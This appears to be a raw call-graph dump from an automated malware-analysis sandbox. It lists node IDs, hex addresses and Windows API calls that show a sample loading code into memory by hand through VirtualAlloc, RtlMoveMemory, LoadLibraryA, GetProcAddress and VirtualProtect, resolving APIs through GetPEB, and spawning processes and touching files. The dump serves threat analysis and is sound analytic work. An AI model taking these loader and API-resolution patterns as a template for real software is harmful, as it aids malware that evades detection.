6400->6402 6414 2b38f0 6400->6414 6402->6122 6403 2b3092 6403->6122 6410 2b7c80 6404->6410 6405 2b7d97 6405->6125 6406 2b7ddd 6407 2b7dfd 6406->6407 6409 2b3f00 GetPEB 6406->6409 6407->6125 6408 2b3f00 GetPEB 6408->6410 6412 2b7df1 6409->6412 6410->6405 6410->6406 6410->6408 6411 2b3e60 GetPEB 6410->6411 6411->6410 6413 2b3e60 GetPEB 6412->6413 6413->6407 6426 2b3910 6414->6426 6415 2b3a3b FindFirstFileW 6418 2b3b8f 6415->6418 6415->6426 6416 2b3ac1 6416->6403 6417 2b3b70 6417->6418 6419 2b3f00 GetPEB 6417->6419 6418->6403 6420 2b3b83 6419->6420 6421 2b3e60 GetPEB 6420->6421 6421->6418 6422 2b34c0 GetPEB 6422->6426 6423 2b3e60 GetPEB 6423->6426 6424 2b3f00 GetPEB 6424->6426 6425 2b38f0 GetPEB 6425->6426 6426->6415 6426->6416 6426->6417 6426->6422 6426->6423 6426->6424 6426->6425 6427 2b3460 GetPEB 6426->6427 6427->6426 6429 2b37ab 6428->6429 6430 2b3795 6428->6430 6434 2b3f00 GetPEB 6429->6434 6436 2b37dd 6429->6436 6431 2b3f00 GetPEB 6430->6431 6432 2b379f 6431->6432 6433 2b3e60 GetPEB 6432->6433 6433->6429 6435 2b37d1 6434->6435 6437 2b3e60 GetPEB 6435->6437 6438 2b3812 6436->6438 6439 2b3f00 GetPEB 6436->6439 6437->6436 6441 2b384a 6438->6441 6443 2b3f00 GetPEB 6438->6443 6440 2b3806 6439->6440 6442 2b3e60 GetPEB 6440->6442 6446 2b3876 6441->6446 6447 2b3f00 GetPEB 6441->6447 6442->6438 6444 2b383e 6443->6444 6445 2b3e60 GetPEB 6444->6445 6445->6441 6449 2b38d1 SHFileOperationW 6446->6449 6451 2b3f00 GetPEB 6446->6451 6448 2b386a 6447->6448 6450 2b3e60 GetPEB 6448->6450 6449->6132 6450->6446 6452 2b38c0 6451->6452 6453 2b3e60 GetPEB 6452->6453 6454 2b38cc 6453->6454 6454->6449 6462 2b1fd2 6455->6462 6456 2b2208 6456->6156 6457 2b2212 6457->6456 6458 2b4220 GetPEB 6457->6458 6458->6456 6459 2b42c0 GetPEB 6459->6462 6460 2b3e60 GetPEB 6460->6462 6461 2b3f00 GetPEB 6461->6462 6462->6456 6462->6457 6462->6459 6462->6460 6462->6461 6470 2b1e86 6463->6470 6464 2b1f77 6465 2b1f68 6464->6465 6466 2b3f00 GetPEB 6464->6466 6465->6156 6467 2b1f98 6466->6467 6468 2b3e60 GetPEB 6467->6468 6468->6465 6469 2b3f00 GetPEB 6469->6470 6470->6464 6470->6465 6470->6469 6471 2b3e60 GetPEB 6470->6471 6471->6470 6473 2b5c26 6472->6473 6474 2b5c10 6472->6474 6478 2b3f00 GetPEB 6473->6478 6482 2b5c4e 6473->6482 6475 2b3f00 GetPEB 6474->6475 6476 2b5c1a 6475->6476 6477 2b3e60 GetPEB 6476->6477 6477->6473 6479 2b5c42 6478->6479 6480 2b3e60 GetPEB 6479->6480 6480->6482 6481 2b5cd2 6481->6156 6482->6481 6483 2b5c99 6482->6483 6484 2b3f00 GetPEB 6482->6484 6486 2b5cc1 6483->6486 6488 2b3f00 GetPEB 6483->6488 6485 2b5c8d 6484->6485 6487 2b3e60 GetPEB 6485->6487 6486->6156 6487->6483 6489 2b5cb5 6488->6489 6490 2b3e60 GetPEB 6489->6490 6490->6486 6492 2b1d06 6491->6492 6493 2b1cf0 6491->6493 6497 2b3f00 GetPEB 6492->6497 6498 2b1dad 6492->6498 6494 2b3f00 GetPEB 6493->6494 6495 2b1cfa 6494->6495 6496 2b3e60 GetPEB 6495->6496 6496->6492 6499 2b1da1 6497->6499 6500 2b1de1 6498->6500 6502 2b3f00 GetPEB 6498->6502 6501 2b3e60 GetPEB 6499->6501 6505 2b4ea0 GetPEB 6500->6505 6501->6498 6503 2b1dd5 6502->6503 6504 2b3e60 GetPEB 6503->6504 6504->6500 6506 2b1e15 6505->6506 6506->6156 6512 2b2255 6507->6512 6508 2b229c 6508->6156 6509 2b3f00 GetPEB 6509->6512 6510 2b25be 6511 2b25cd 6510->6511 6514 2b4220 GetPEB 6510->6514 6511->6156 6512->6508 6512->6509 6512->6510 6513 2b3e60 GetPEB 6512->6513 6513->6512 6514->6511 6528 2b2c1a 6515->6528 6516 2b2fcf 6519 2b2fee 6516->6519 6520 2b3f00 GetPEB 6516->6520 6518 2b2cae 6518->6156 6519->6156 6522 2b2fe2 6520->6522 6521 2b34c0 GetPEB 6521->6528 6523 2b3e60 GetPEB 6522->6523 6523->6519 6524 2b3f00 GetPEB 6524->6528 6525 2b3e60 GetPEB 6525->6528 6526 2b4220 GetPEB 6526->6528 6527 2b3460 GetPEB 6527->6528 6528->6516 6528->6518 6528->6521 6528->6524 6528->6525 6528->6526 6528->6527 6567 2b56f0 6528->6567 6576 2b2980 6528->6576 6533 2b4eb6 6530->6533 6531 2b4f3d 6531->6156 6532 2b3f00 GetPEB 6532->6533 6533->6531 6533->6532 6534 2b3e60 GetPEB 6533->6534 6534->6533 6556 2b191f 6535->6556 6536 2b1bc6 6537 2b35c0 GetPEB 6536->6537 6539 2b1bd0 6537->6539 6538 2b1ba4 6538->6156 6540 2b1bf1 6539->6540 6541 2b3f00 GetPEB 6539->6541 6545 2b1c23 6540->6545 6546 2b3f00 GetPEB 6540->6546 6543 2b1be5 6541->6543 6542 2b3e60 GetPEB 6542->6556 6544 2b3e60 GetPEB 6543->6544 6544->6540 6548 2b1c4b 6545->6548 6551 2b3f00 GetPEB 6545->6551 6547 2b1c17 6546->6547 6550 2b3e60 GetPEB 6547->6550 6548->6156 6549 2b3f00 GetPEB 6549->6556 6550->6545 6553 2b1c3f 6551->6553 6552 2b4e30 GetPEB 6552->6556 6554 2b3e60 GetPEB 6553->6554 6554->6548 6556->6536 6556->6538 6556->6542 6556->6549 6556->6552 6589 2b35c0 6556->6589 6558 2b422d 6557->6558 6561 2b4243 6557->6561 6559 2b3f00 GetPEB 6558->6559 6560 2b4237 6559->6560 6562 2b3e60 GetPEB 6560->6562 6563 2b426b 6561->6563 6564 2b3f00 GetPEB 6561->6564 6562->6561 6563->6141 6565 2b425f 6564->6565 6566 2b3e60 GetPEB 6565->6566 6566->6563 6575 2b5701 6567->6575 6568 2b57e3 6570 2b5723 6568->6570 6571 2b3f00 GetPEB 6568->6571 6569 2b3f00 GetPEB 6569->6575 6570->6528 6572 2b57f6 6571->6572 6574 2b3e60 GetPEB 6572->6574 6573 2b3e60 GetPEB 6573->6575 6574->6570 6575->6568 6575->6569 6575->6570 6575->6573 6585 2b29a0 6576->6585 6577 2b2abf 6579 2b2b0c 6577->6579 6580 2b2ae4 6577->6580 6582 2b3f00 GetPEB 6577->6582 6578 2b3f00 GetPEB 6578->6585 6579->6528 6580->6579 6586 2b3f00 GetPEB 6580->6586 6581 2b3e60 GetPEB 6581->6585 6583 2b2ad8 6582->6583 6584 2b3e60 GetPEB 6583->6584 6584->6580 6585->6577 6585->6578 6585->6581 6587 2b2b00 6586->6587 6588 2b3e60 GetPEB 6587->6588 6588->6579 6590 2b35e4 6589->6590 6591 2b3609 6590->6591 6592 2b3f00 GetPEB 6590->6592 6595 2b3f00 GetPEB 6591->6595 6598 2b3631 6591->6598 6593 2b35fd 6592->6593 6594 2b3e60 GetPEB 6593->6594 6594->6591 6596 2b3625 6595->6596 6597 2b3e60 GetPEB 6596->6597 6597->6598 6598->6556 6600 2b5516 6599->6600 6605 2b552c 6599->6605 6601 2b3f00 GetPEB 6600->6601 6602 2b5520 6601->6602 6603 2b3e60 GetPEB 6602->6603 6603->6605 6604 2b5586 6604->6172 6605->6604 6606 2b3f00 GetPEB 6605->6606 6607 2b557a 6606->6607 6608 2b3e60 GetPEB 6607->6608 6608->6604 6617 2bab66 6609->6617 6612 2bab8c 6612->6192 6613 2bac52 6614 2bac71 6613->6614 6615 2b3f00 GetPEB 6613->6615 6618 2bac99 6614->6618 6621 2b3f00 GetPEB 6614->6621 6616 2bac65 6615->6616 6619 2b3e60 GetPEB 6616->6619 6617->6612 6617->6613 6620 2b3f00 GetPEB 6617->6620 6622 2b3e60 GetPEB 6617->6622 6682 2b4b70 6617->6682 6704 2bacd0 6617->6704 6618->6192 6619->6614 6620->6617 6623 2bac8d 6621->6623 6622->6617 6624 2b3e60 GetPEB 6623->6624 6624->6618 6644 2ba189 6625->6644 6626 2ba552 6629 2ba571 6626->6629 6632 2b3f00 GetPEB 6626->6632 6627 2ba439 6627->6192 6628 2bacd0 GetPEB 6628->6644 6638 2ba599 6629->6638 6639 2b3f00 GetPEB 6629->6639 6631 2b34c0 GetPEB 6631->6644 6634 2ba565 6632->6634 6633 2b4220 GetPEB 6633->6644 6636 2b3e60 GetPEB 6634->6636 6635 2b4b70 2 API calls 6635->6644 6636->6629 6638->6192 6640 2ba58d 6639->6640 6643 2b3e60 GetPEB 6640->6643 6641 2b3f00 GetPEB 6641->6644 6642 2b3460 GetPEB 6642->6644 6643->6638 6644->6626 6644->6627 6644->6628 6644->6631 6644->6633 6644->6635 6644->6641 6644->6642 6645 2b3e60 GetPEB 6644->6645 6714 2bb520 6644->6714 6721 2b1150 6644->6721 6645->6644 6659 2ba7c5 6646->6659 6647 2baa19 6647->6192 6648 2bacd0 GetPEB 6648->6659 6649 2baa7c GetCurrentProcessId 6649->6659 6650 2baacd 6651 2baaec 6650->6651 6654 2b3f00 GetPEB 6650->6654 6660 2b3f00 GetPEB 6651->6660 6663 2bab14 6651->6663 6652 2b4b70 2 API calls 6652->6659 6656 2baae0 6654->6656 6658 2b3e60 GetPEB 6656->6658 6657 2b42c0 GetPEB 6657->6659 6658->6651 6659->6647 6659->6648 6659->6649 6659->6650 6659->6652 6659->6657 6661 2b3f00 GetPEB 6659->6661 6665 2b3e60 GetPEB 6659->6665 6736 2b49a0 6659->6736 6746 2b4850 6659->6746 6662 2bab08 6660->6662 6661->6659 6664 2b3e60 GetPEB 6662->6664 6663->6192 6664->6663 6665->6659 6667 2ba5ef 6666->6667 6669 2ba731 6667->6669 6670 2ba710 6667->6670 6672 2b3f00 GetPEB 6667->6672 6673 2b42c0 GetPEB 6667->6673 6677 2b3e60 GetPEB 6667->6677 6755 2b4370 6667->6755 6671 2ba750 6669->6671 6674 2b3f00 GetPEB 6669->6674 6670->6192 6678 2ba778 6671->6678 6679 2b3f00 GetPEB 6671->6679 6672->6667 6673->6667 6675 2ba744 6674->6675 6676 2b3e60 GetPEB 6675->6676 6676->6671 6677->6667 6678->6192 6680 2ba76c 6679->6680 6681 2b3e60 GetPEB 6680->6681 6681->6678 6683 2b4b98 6682->6683 6684 2b4b82 6682->6684 6688 2b4bd7 CreateProcessW 6683->6688 6689 2b3f00 GetPEB 6683->6689 6685 2b3f00 GetPEB 6684->6685 6686 2b4b8c 6685->6686 6687 2b3e60 GetPEB 6686->6687 6687->6683 6690 2b4c73 6688->6690 6691 2b4bf7 6688->6691 6692 2b4bc6 6689->6692 6690->6617 6693 2b4bff 6691->6693 6695 2b4c33 6691->6695 6696 2b3f00 GetPEB 6691->6696 6694 2b3e60 GetPEB 6692->6694 6693->6617 6697 2b4bd2 6694->6697 6700 2b4c5d 6695->6700 6701 2b3f00 GetPEB 6695->6701 6698 2b4c27 6696->6698 6697->6688 6699 2b3e60 GetPEB 6698->6699 6699->6695 6700->6617 6702 2b4c51 6701->6702 6703 2b3e60 GetPEB 6702->6703 6703->6700 6711 2baced 6704->6711 6705 2b34c0 GetPEB 6705->6711 6706 2baf9f 6707 2baf37 6706->6707 6708 2b3f00 GetPEB 6706->6708 6707->6617 6709 2bafb2 6708->6709 6712 2b3e60 GetPEB 6709->6712 6710 2b3f00 GetPEB 6710->6711 6711->6705 6711->6706 6711->6707 6711->6710 6713 2b3e60 GetPEB 6711->6713 6712->6707 6713->6711 6720 2bb536 6714->6720 6715 2bb55f 6715->6644 6716 2bb633 6730 2b4fd0 6716->6730 6718 2b3e60 GetPEB 6718->6720 6719 2b3f00 GetPEB 6719->6720 6720->6715 6720->6716 6720->6718 6720->6719 6727 2b1160 6721->6727 6722 2b124c 6723 2b1244 6722->6723 6725 2b3f00 GetPEB 6722->6725 6723->6644 6724 2b3f00 GetPEB 6724->6727 6726 2b125f 6725->6726 6728 2b3e60 GetPEB 6726->6728 6727->6722 6727->6723 6727->6724 6729 2b3e60 GetPEB 6727->6729 6728->6723 6729->6727 6731 2b4ff9 6730->6731 6732 2b500f 6730->6732 6733 2b3f00 GetPEB 6731->6733 6732->6715 6734 2b5003 6733->6734 6735 2b3e60 GetPEB 6734->6735 6735->6732 6745 2b49c0 6736->6745 6737 2b4b37 6738 2b49ea 6737->6738 6739 2b3f00 GetPEB 6737->6739 6738->6659 6741 2b4b4a 6739->6741 6740 2b34c0 GetPEB 6740->6745 6742 2b3e60 GetPEB 6741->6742 6742->6738 6743 2b3e60 GetPEB 6743->6745 6744 2b3f00 GetPEB 6744->6745 6745->6737 6745->6738 6745->6740 6745->6743 6745->6744 6754 2b4870 6746->6754 6747 2b496e 6748 2b492c 6747->6748 6749 2b3f00 GetPEB 6747->6749 6748->6659 6751 2b4981 6749->6751 6750 2b3f00 GetPEB 6750->6754 6752 2b3e60 GetPEB 6751->6752 6752->6748 6753 2b3e60 GetPEB 6753->6754 6754->6747 6754->6748 6754->6750 6754->6753 6756 2b450e 6755->6756 6757 2b4384 6755->6757 6756->6667 6757->6756 6758 2b3f00 GetPEB 6757->6758 6760 2b43d6 6757->6760 6759 2b43ca 6758->6759 6761 2b3e60 GetPEB 6759->6761 6762 2b3f00 GetPEB 6760->6762 6769 2b4436 6760->6769 6774 2b44f4 6760->6774 6761->6760 6763 2b442a 6762->6763 6765 2b3e60 GetPEB 6763->6765 6764 2b44ba 6775 2b4550 6764->6775 6765->6769 6767 2b3f00 GetPEB 6767->6769 6769->6764 6769->6767 6770 2b3e60 GetPEB 6769->6770 6770->6769 6771 2b3f00 GetPEB 6772 2b44e8 6771->6772 6773 2b3e60 GetPEB 6772->6773 6773->6774 6774->6667 6777 2b44d0 6775->6777 6778 2b456b 6775->6778 6776 2b3e60 GetPEB 6776->6778 6777->6771 6777->6774 6778->6776 6778->6777 6779 2b3f00 GetPEB 6778->6779 6779->6778 6787 2b55c6 6780->6787 6781 2b56a8 6782 2b55e8 6781->6782 6784 2b3f00 GetPEB 6781->6784 6782->6214 6783 2b3e60 GetPEB 6783->6787 6786 2b56bb 6784->6786 6785 2b3f00 GetPEB 6785->6787 6788 2b3e60 GetPEB 6786->6788 6787->6781 6787->6782 6787->6783 6787->6785 6788->6782 6793 2b4ca0 6789->6793 6790 2b4db4 6791 2b4d7c 6790->6791 6794 2b3f00 GetPEB 6790->6794 6791->6214 6792 2b3f00 GetPEB 6792->6793 6793->6790 6793->6791 6793->6792 6797 2b3e60 GetPEB 6793->6797 6795 2b4dc7 6794->6795 6796 2b3e60 GetPEB 6795->6796 6796->6791 6797->6793 6799 2b46d7 6798->6799 6804 2b46ed 6798->6804 6800 2b3f00 GetPEB 6799->6800 6801 2b46e1 6800->6801 6802 2b3e60 GetPEB 6801->6802 6802->6804 6803 2b4760 6803->6223 6804->6803 6805 2b3f00 GetPEB 6804->6805 6810 2b4721 6804->6810 6806 2b4715 6805->6806 6808 2b3e60 GetPEB 6806->6808 6807 2b4752 6807->6223 6808->6810 6809 2b3f00 GetPEB 6811 2b4746 6809->6811 6810->6807 6810->6809 6812 2b3e60 GetPEB 6811->6812 6812->6807 6825 2b25f0 6813->6825 6814 2b2771 6814->6247 6815 2b2912 6816 2b2937 6815->6816 6818 2b3f00 GetPEB 6815->6818 6820 2b295f 6816->6820 6823 2b3f00 GetPEB 6816->6823 6817 2b42c0 GetPEB 6817->6825 6819 2b292b 6818->6819 6821 2b3e60 GetPEB 6819->6821 6820->6247 6821->6816 6822 2b3f00 GetPEB 6822->6825 6824 2b2953 6823->6824 6827 2b3e60 GetPEB 6824->6827 6825->6814 6825->6815 6825->6817 6825->6822 6826 2b3e60 GetPEB 6825->6826 6826->6825 6827->6820 6836 2b1010 6828->6836 6829 2b3f00 GetPEB 6829->6836 6830 2b1105 6831 2b103a 6830->6831 6833 2b3f00 GetPEB 6830->6833 6831->6273 6832 2b3e60 GetPEB 6832->6836 6834 2b1118 6833->6834 6835 2b3e60 GetPEB 6834->6835 6835->6831 6836->6829 6836->6830 6836->6831 6836->6832 6838 2b34c0 GetPEB 6837->6838 6839 2b36c4 6838->6839 6840 2b36e5 6839->6840 6841 2b3f00 GetPEB 6839->6841 6844 2b371a 6840->6844 6845 2b3f00 GetPEB 6840->6845 6842 2b36d9 6841->6842 6843 2b3e60 GetPEB 6842->6843 6843->6840 6848 2b3f00 GetPEB 6844->6848 6853 2b3742 6844->6853 6846 2b370e 6845->6846 6847 2b3e60 GetPEB 6846->6847 6847->6844 6849 2b3736 6848->6849 6850 2b3e60 GetPEB 6849->6850 6850->6853 6851 2b376e 6851->6049 6852 2b3f00 GetPEB 6854 2b3762 6852->6854 6853->6851 6853->6852 6855 2b3e60 GetPEB 6854->6855 6855->6851 6862 2b7712 6856->6862 6857 2b77b3 6859 2b77d2 6857->6859 6861 2b3f00 GetPEB 6857->6861 6858 2b34c0 GetPEB 6858->6862 6859->6360 6860 2b78a3 6860->6360 6863 2b77c6 6861->6863 6862->6857 6862->6858 6862->6860 6864 2b3f00 GetPEB 6862->6864 6866 2b3e60 GetPEB 6862->6866 6865 2b3e60 GetPEB 6863->6865 6864->6862 6865->6859 6866->6862 7101 2b9b60 7102 2b9b80 7101->7102 7103 2b9d96 7102->7103 7104 2b9d12 7102->7104 7105 2b3f00 GetPEB 7102->7105 7107 2b9dd0 GetPEB 7102->7107 7110 2b3e60 GetPEB 7102->7110 7103->7104 7106 2b3f00 GetPEB 7103->7106 7105->7102 7108 2b9da9 7106->7108 7107->7102 7109 2b3e60 GetPEB 7108->7109 7109->7104 7110->7102 7111 2b47e0 7112 2b4c80 GetPEB 7111->7112 7113 2b47f5 7112->7113 5818 2a0170 5819 2a01fb 5818->5819 5834 2a0ad0 5819->5834 5825 2a02c4 5871 2a06f0 5825->5871 5827 2a02d0 5888 2a08f0 5827->5888 5829 2a02dc 5906 2a0580 5829->5906 5831 2a02e8 5832 2a02ef VirtualFree 5831->5832 5833 2a02fb 5831->5833 5832->5833 5835 2a0b2f 5834->5835 5836 2a0bf0 VirtualAlloc 5835->5836 5839 2a02ab 5835->5839 5837 2a0c1c 5836->5837 5838 2a0cdb VirtualAlloc 5837->5838 5837->5839 5838->5839 5840 2a0d60 5839->5840 5841 2a0d94 5840->5841 5842 2a0da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 2a02b8 5842->5843 5847 2a0ddb 5842->5847 5850 2a0400 GetCurrentProcess 5843->5850 5845 2a0e0d RtlMoveMemory 5845->5847 5846 2a0e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 2a0e6a RtlMoveMemory 5847->5848 5849 2a0e91 RtlFillMemory 5847->5849 5914 2a1140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 2a1140 lstrcpynW 5850->5915 5852 2a0459 NtQueryInformationProcess 5853 2a046f 5852->5853 5856 2a04c5 5852->5856 5854 2a0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5854 5855 2a0484 GetProcessHeap HeapFree 5853->5855 5858 2a0575 5853->5858 5854->5853 5854->5856 5855->5854 5857 2a04e5 5856->5857 5921 2a1140 lstrcpynW 5856->5921 5916 2a1140 lstrcpynW 5857->5916 5861 2a04dc RtlMoveMemory 5861->5857 5862 2a04ef RtlMoveMemory 5917 2a1140 lstrcpynW 5862->5917 5864 2a0511 RtlMoveMemory 5918 2a1140 lstrcpynW 5864->5918 5866 2a0528 RtlMoveMemory 5919 2a1140 lstrcpynW 5866->5919 5868 2a053f RtlMoveMemory 5920 2a1140 lstrcpynW 5868->5920 5870 2a055a RtlMoveMemory 5870->5825 5872 2a0740 5871->5872 5878 2a0744 5872->5878 5922 2a0fb0 5872->5922 5875 2a07b5 RtlMoveMemory 5876 2a0770 5875->5876 5877 2a07ff LoadLibraryA 5876->5877 5876->5878 5930 2a1140 lstrcpynW 5876->5930 5879 2a08b9 5877->5879 5882 2a080f 5877->5882 5878->5827 5879->5827 5881 2a082d RtlMoveMemory 5881->5876 5881->5882 5882->5876 5882->5878 5883 2a0858 GetProcAddress 5882->5883 5887 2a0890 RtlMoveMemory 5882->5887 5931 2a1140 lstrcpynW 5882->5931 5932 2a1140 lstrcpynW 5882->5932 5883->5878 5883->5882 5885 2a0872 RtlMoveMemory 5933 2a1140 lstrcpynW 5885->5933 5887->5878 5887->5882 5889 2a0934 5888->5889 5890 2a0fb0 2 API calls 5889->5890 5891 2a0938 5889->5891 5892 2a0970 5890->5892 5891->5829 5892->5891 5936 2a1140 lstrcpynW 5892->5936 5894 2a09af RtlMoveMemory 5894->5891 5898 2a09c2 5894->5898 5897 2a09f6 RtlMoveMemory 5897->5898 5898->5891 5937 2a1140 lstrcpynW 5898->5937 5938 2a1140 lstrcpynW 5898->5938 5940 2a1140 lstrcpynW 5898->5940 5899 2a0a97 RtlMoveMemory 5899->5898 5900 2a0aac 5899->5900 5900->5829 5902 2a0a3e RtlMoveMemory 5902->5891 5903 2a0a57 5902->5903 5939 2a1140 lstrcpynW 5903->5939 5905 2a0a61 RtlMoveMemory 5905->5898 5907 2a05bc 5906->5907 5908 2a05c0 5907->5908 5912 2a069b VirtualProtect 5907->5912 5941 2a1140 lstrcpynW 5907->5941 5942 2a1140 lstrcpynW 5907->5942 5908->5831 5910 2a0617 RtlMoveMemory 5910->5907 5912->5907 5913 2a06c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 2a0fda 5922->5924 5923 2a104a 5923->5876 5924->5923 5934 2a1140 lstrcpynW 5924->5934 5926 2a1001 5935 2a1140 lstrcpynW 5926->5935 5928 2a101b RtlMoveMemory 5929 2a1029 5928->5929 5929->5876 5930->5875 5931->5881 5932->5885 5933->5882 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5899 5941->5910 5942->5907 6867 2b4b70 6868 2b4b98 6867->6868 6869 2b4b82 6867->6869 6873 2b4bd7 CreateProcessW 6868->6873 6874 2b3f00 GetPEB 6868->6874 6870 2b3f00 GetPEB 6869->6870 6871 2b4b8c 6870->6871 6872 2b3e60 GetPEB 6871->6872 6872->6868 6875 2b4c73 6873->6875 6876 2b4bf7 6873->6876 6877 2b4bc6 6874->6877 6878 2b4bff 6876->6878 6880 2b4c33 6876->6880 6881 2b3f00 GetPEB 6876->6881 6879 2b3e60 GetPEB 6877->6879 6882 2b4bd2 6879->6882 6885 2b4c5d 6880->6885 6886 2b3f00 GetPEB 6880->6886 6883 2b4c27 6881->6883 6882->6873 6884 2b3e60 GetPEB 6883->6884 6884->6880 6887 2b4c51 6886->6887 6888 2b3e60 GetPEB 6887->6888 6888->6885 6917 2b64b0 6918 2b64ba 6917->6918 6922 2b64d0 6917->6922 6919 2b3f00 GetPEB 6918->6919 6920 2b64c4 6919->6920 6921 2b3e60 GetPEB 6920->6921 6921->6922 6923 2b42c0 GetPEB 6922->6923 6926 2b659a 6922->6926 6924 2b657b 6923->6924 6924->6926 6927 2b4160 6924->6927 6928 2b4172 6927->6928 6929 2b4180 6927->6929 6930 2b3f00 GetPEB 6928->6930 6929->6926 6931 2b4177 6930->6931 6932 2b3e60 GetPEB 6931->6932 6932->6929 6939 2b7fb0 6940 2b34c0 GetPEB 6939->6940 6941 2b7fc2 6940->6941 6942 2b7fe3 6941->6942 6943 2b3f00 GetPEB 6941->6943 6946 2b3f00 GetPEB 6942->6946 6948 2b8029 6942->6948 6944 2b7fd7 6943->6944 6945 2b3e60 GetPEB 6944->6945 6945->6942 6947 2b801d 6946->6947 6949 2b3e60 GetPEB 6947->6949 6950 2b8051 6948->6950 6951 2b3f00 GetPEB 6948->6951 6949->6948 6953 2b807d 6950->6953 6955 2b3f00 GetPEB 6950->6955 6952 2b8045 6951->6952 6954 2b3e60 GetPEB 6952->6954 6954->6950 6956 2b8071 6955->6956 6957 2b3e60 GetPEB 6956->6957 6957->6953 6958 2b78b0 6967 2b7990 6958->6967 6959 2b7c1e 6960 2b7c3d 6959->6960 6963 2b3f00 GetPEB 6959->6963 6961 2b34c0 GetPEB 6961->6967 6962 2b7c05 6964 2b7c31 6963->6964 6965 2b3e60 GetPEB 6964->6965 6965->6960 6966 2b3f00 GetPEB 6966->6967 6967->6959 6967->6961 6967->6962 6967->6966 6968 2b3e60 GetPEB 6967->6968 6968->6967 7130 2b4df0 GetPEB 6969 2b6208 6977 2b6202 6969->6977 6970 2b55b0 GetPEB 6970->6977 6971 2b4c80 GetPEB 6971->6977 6972 2b42c0 GetPEB 6972->6977 6973 2b624b 6974 2b3f00 GetPEB 6974->6977 6975 2b6490 6976 2b3f00 GetPEB 6979 2b642d 6976->6979 6977->6970 6977->6971 6977->6972 6977->6973 6977->6974 6978 2b3e60 GetPEB 6977->6978 6977->6979 6978->6977 6979->6975 6979->6976 6980 2b3e60 GetPEB 6979->6980 6980->6979 6981 2b6608 7023 2b65fd 6981->7023 6982 2b94d0 GetPEB 6982->7023 6983 2b8bb0 2 API calls 6983->7023 6984 2b706e 6993 2b8740 3 API calls 6984->6993 6985 2b9f30 GetPEB 6985->7023 6986 2b68df 6987 2b6dcd 6994 2bb2e0 GetPEB 6987->6994 6988 2b7410 GetPEB 6988->7023 6989 2b7061 7001 2b8d40 2 API calls 6989->7001 6990 2b72d0 GetPEB 6990->7023 6991 2b9050 GetPEB 6991->7023 6992 2bb1d0 GetPEB 6992->7023 7003 2b7073 6993->7003 6994->6986 6995 2b53d0 GetPEB 6995->7023 6996 2b6f27 GetTickCount 6996->7023 6997 2b9270 GetPEB 6997->7023 6998 2b7120 3 API calls 6998->7023 6999 2b8700 GetPEB 6999->7023 7000 2b9860 6 API calls 7000->7023 7010 2b7066 7001->7010 7002 2b61e0 GetPEB 7002->7023 7004 2b80a0 2 API calls 7004->7023 7005 2b3e60 GetPEB 7005->7023 7006 2b12b0 2 API calls 7006->7023 7007 2bb430 3 API calls 7007->7023 7008 2b8970 2 API calls 7008->7023 7009 2b3f00 GetPEB 7009->7023 7011 2b4770 2 API calls 7011->7023 7012 2b3310 GetPEB 7012->7023 7013 2b4220 GetPEB 7013->7023 7014 2b6060 GetPEB 7014->7023 7015 2b8400 2 API calls 7015->7023 7016 2b8e80 2 API calls 7016->7023 7017 2b9620 2 API calls 7017->7023 7018 2b6975 GetTickCount 7018->7023 7019 2b1840 GetPEB 7019->7023 7020 2b3460 GetPEB 7020->7023 7021 2bafe0 GetPEB 7021->7023 7022 2b4160 GetPEB 7022->7023 7023->6982 7023->6983 7023->6984 7023->6985 7023->6986 7023->6987 7023->6988 7023->6989 7023->6990 7023->6991 7023->6992 7023->6995 7023->6996 7023->6997 7023->6998 7023->6999 7023->7000 7023->7002 7023->7004 7023->7005 7023->7006 7023->7007 7023->7008 7023->7009 7023->7011 7023->7012 7023->7013 7023->7014 7023->7015 7023->7016 7023->7017 7023->7018 7023->7019 7023->7020 7023->7021 7023->7022 5969 2b3780 5970 2b37ab 5969->5970 5971 2b3795 5969->5971 5975 2b3f00 GetPEB 5970->5975 5977 2b37dd 5970->5977 5972 2b3f00 GetPEB 5971->5972 5973 2b379f 5972->5973 5974 2b3e60 GetPEB 5973->5974 5974->5970 5976 2b37d1 5975->5976 5978 2b3e60 GetPEB 5976->5978 5979 2b3812 5977->5979 5980 2b3f00 GetPEB 5977->5980 5978->5977 5982 2b384a 5979->5982 5984 2b3f00 GetPEB 5979->5984 5981 2b3806 5980->5981 5983 2b3e60 GetPEB 5981->5983 5987 2b3876 5982->5987 5988 2b3f00 GetPEB 5982->5988 5983->5979 5985 2b383e 5984->5985 5986 2b3e60 GetPEB 5985->5986 5986->5982 5990 2b38d1 SHFileOperationW 5987->5990 5992 2b3f00 GetPEB 5987->5992 5989 2b386a 5988->5989 5991 2b3e60 GetPEB 5989->5991 5991->5987 5993 2b38c0 5992->5993 5994 2b3e60 GetPEB 5993->5994 5995 2b38cc 5994->5995 5995->5990 7036 2b2b80 7037 2b2b99 7036->7037 7038 2b2baf 7036->7038 7039 2b3f00 GetPEB 7037->7039 7040 2b2ba3 7039->7040 7041 2b3e60 GetPEB 7040->7041 7041->7038 7137 2b7e40 7139 2b7e50 7137->7139 7138 2b7f83 7140 2b38f0 2 API calls 7138->7140 7139->7138 7141 2b7f7a 7139->7141 7143 2b34c0 GetPEB 7139->7143 7144 2b3f00 GetPEB 7139->7144 7145 2b3e60 GetPEB 7139->7145 7142 2b7f96 7140->7142 7143->7139 7144->7139 7145->7139 7057 2ba198 7077 2ba189 7057->7077 7058 2ba552 7063 2b3f00 GetPEB 7058->7063 7067 2ba571 7058->7067 7059 2ba439 7060 2bacd0 GetPEB 7060->7077 7061 2b1150 GetPEB 7061->7077 7062 2b34c0 GetPEB 7062->7077 7066 2ba565 7063->7066 7064 2b4220 GetPEB 7064->7077 7065 2b3f00 GetPEB 7065->7077 7069 2b3e60 GetPEB 7066->7069 7071 2ba599 7067->7071 7073 2b3f00 GetPEB 7067->7073 7068 2b4b70 2 API calls 7068->7077 7069->7067 7070 2bb520 GetPEB 7070->7077 7072 2b3e60 GetPEB 7072->7077 7074 2ba58d 7073->7074 7076 2b3e60 GetPEB 7074->7076 7075 2b3460 GetPEB 7075->7077 7076->7071 7077->7058 7077->7059 7077->7060 7077->7061 7077->7062 7077->7064 7077->7065 7077->7068 7077->7070 7077->7072 7077->7075 7146 2b1fd8 7153 